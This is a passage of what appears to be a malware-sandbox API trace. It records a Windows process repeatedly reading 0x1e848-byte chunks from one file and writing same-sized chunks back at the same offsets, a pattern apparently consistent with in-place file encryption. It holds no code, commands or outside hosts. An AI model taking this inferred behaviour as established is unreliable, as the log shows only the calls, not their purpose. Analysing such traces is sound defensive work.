lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.132] GetProcessHeap () returned 0x500000 [0129.132] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.132] GetProcessHeap () returned 0x500000 [0129.132] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.132] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9859770, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.132] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.142] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9859770, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.142] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.142] GetProcessHeap () returned 0x500000 [0129.143] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.143] GetProcessHeap () returned 0x500000 [0129.143] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.143] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9896800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.143] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.154] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9896800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.154] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.154] GetProcessHeap () returned 0x500000 [0129.155] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.155] GetProcessHeap () returned 0x500000 [0129.155] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.155] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x98d3890, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.155] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.166] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x98d3890, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.166] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.167] GetProcessHeap () returned 0x500000 [0129.167] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.167] GetProcessHeap () returned 0x500000 [0129.167] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.167] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9910920, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.167] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.184] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9910920, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.184] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.184] GetProcessHeap () returned 0x500000 [0129.184] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.184] GetProcessHeap () returned 0x500000 [0129.184] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.185] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x994d9b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.185] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.197] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x994d9b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.197] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.198] GetProcessHeap () returned 0x500000 [0129.198] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.198] GetProcessHeap () returned 0x500000 [0129.198] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.198] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x998aa40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.198] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.206] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x998aa40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.207] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.207] GetProcessHeap () returned 0x500000 [0129.207] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.207] GetProcessHeap () returned 0x500000 [0129.207] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.207] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x99c7ad0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.208] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.426] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x99c7ad0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.426] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.427] GetProcessHeap () returned 0x500000 [0129.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.427] GetProcessHeap () returned 0x500000 [0129.427] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.427] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9a04b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.427] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.443] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9a04b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.443] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.444] GetProcessHeap () returned 0x500000 [0129.444] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.444] GetProcessHeap () returned 0x500000 [0129.444] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.444] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9a41bf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.444] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.453] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9a41bf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.453] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.454] GetProcessHeap () returned 0x500000 [0129.454] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.454] GetProcessHeap () returned 0x500000 [0129.454] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.454] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9a7ec80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.454] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.463] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9a7ec80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.463] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.464] GetProcessHeap () returned 0x500000 [0129.464] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.464] GetProcessHeap () returned 0x500000 [0129.464] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.464] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9abbd10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.464] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.666] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9abbd10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.667] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.667] GetProcessHeap () returned 0x500000 [0129.667] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.667] GetProcessHeap () returned 0x500000 [0129.667] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.667] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9af8da0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.667] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.904] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9af8da0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.904] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.906] GetProcessHeap () returned 0x500000 [0129.906] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.906] GetProcessHeap () returned 0x500000 [0129.906] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.906] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9b35e30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.906] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0129.931] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9b35e30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.931] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0129.932] GetProcessHeap () returned 0x500000 [0129.932] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0129.932] GetProcessHeap () returned 0x500000 [0129.932] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0129.932] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9b72ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.932] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.172] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9b72ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.172] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.172] GetProcessHeap () returned 0x500000 [0130.172] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.172] GetProcessHeap () returned 0x500000 [0130.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.173] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9baff50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.173] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.214] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9baff50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.214] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.215] GetProcessHeap () returned 0x500000 [0130.215] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.215] GetProcessHeap () returned 0x500000 [0130.215] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.215] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9becfe0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.215] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.295] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9becfe0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.295] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.295] GetProcessHeap () returned 0x500000 [0130.295] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.296] GetProcessHeap () returned 0x500000 [0130.296] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.296] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9c2a070, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.296] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.306] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9c2a070, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.306] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.308] GetProcessHeap () returned 0x500000 [0130.308] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.308] GetProcessHeap () returned 0x500000 [0130.308] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.308] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9c67100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.309] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.318] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9c67100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.319] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.319] GetProcessHeap () returned 0x500000 [0130.319] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.319] GetProcessHeap () returned 0x500000 [0130.319] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.319] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9ca4190, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.319] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.328] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9ca4190, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.328] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.329] GetProcessHeap () returned 0x500000 [0130.329] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.329] GetProcessHeap () returned 0x500000 [0130.329] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.329] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9ce1220, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.329] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.344] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9ce1220, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.344] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.345] GetProcessHeap () returned 0x500000 [0130.345] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.345] GetProcessHeap () returned 0x500000 [0130.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.345] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9d1e2b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.345] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.360] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9d1e2b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.360] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.360] GetProcessHeap () returned 0x500000 [0130.360] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.360] GetProcessHeap () returned 0x500000 [0130.360] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.360] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9d5b340, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.360] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.369] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9d5b340, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.369] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.369] GetProcessHeap () returned 0x500000 [0130.370] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.370] GetProcessHeap () returned 0x500000 [0130.370] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.370] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9d983d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.370] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.379] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9d983d0, lpNewFilePointer=0x0, 